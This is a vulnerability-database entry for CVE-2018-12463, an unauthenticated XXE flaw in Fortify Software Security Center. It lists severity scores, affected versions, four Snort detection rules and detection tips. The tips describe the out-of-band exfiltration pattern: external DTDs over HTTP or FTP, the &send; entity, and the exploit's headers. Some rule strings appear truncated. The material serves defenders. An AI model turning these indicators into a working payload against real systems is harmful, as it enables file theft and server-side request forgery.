cbcvebase.
CVE-2018-12463
published 2018-07-12

CVE-2018-12463: An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read…

PriorityP269critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
13.85%
96.1th percentile
An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.

Affected

4 ranges
VendorProductVersion rangeFixed in
hpfortify_software_security_center
hpfortify_software_security_center
hpfortify_software_security_center
micro_focusfortify_software_security_center

Detection & IOCsextracted from sources · hover to see the quote

path/ssc/fm-ws/services
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 1"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:""; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025841; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 2"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025842; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 3"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*ftp\x3a\x2f\x2f/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025843; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 4"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; content:"&send|3b|"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025844; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
  • Target the unauthenticated SOAP endpoint POST /ssc/fm-ws/services — no credentials are required to exploit this XXE vulnerability.
  • Inspect HTTP request bodies to /fm-ws/services for DOCTYPE declarations referencing external DTDs over HTTP (SYSTEM "http://...*.dtd") — indicative of OOB-XXE exfiltration attempts.
  • Inspect HTTP request bodies to /fm-ws/services for DOCTYPE declarations referencing external DTDs over FTP (SYSTEM "ftp://...") — indicative of FTP-based OOB-XXE exfiltration.
  • Look for the XML entity reference &send; in POST bodies to /fm-ws/services, which is the OOB-XXE trigger entity used to exfiltrate data to an attacker-controlled server.
  • The exploit sets Content-Type to 'text/xml; charset=UTF-8; text/html;' and SOAPAction: "" — anomalous Content-Type concatenation can be used as an additional detection signal.
  • ·The vulnerability affects only specific versions of Fortify SSC; confirm the deployed version before applying detections to avoid false positives on patched instances.
  • ·The Snort/ET rules use PCRE on the HTTP request body; ensure your IDS/IPS is configured to inspect full request bodies (not just headers) for the /fm-ws/services URI path.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv3.07.3HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.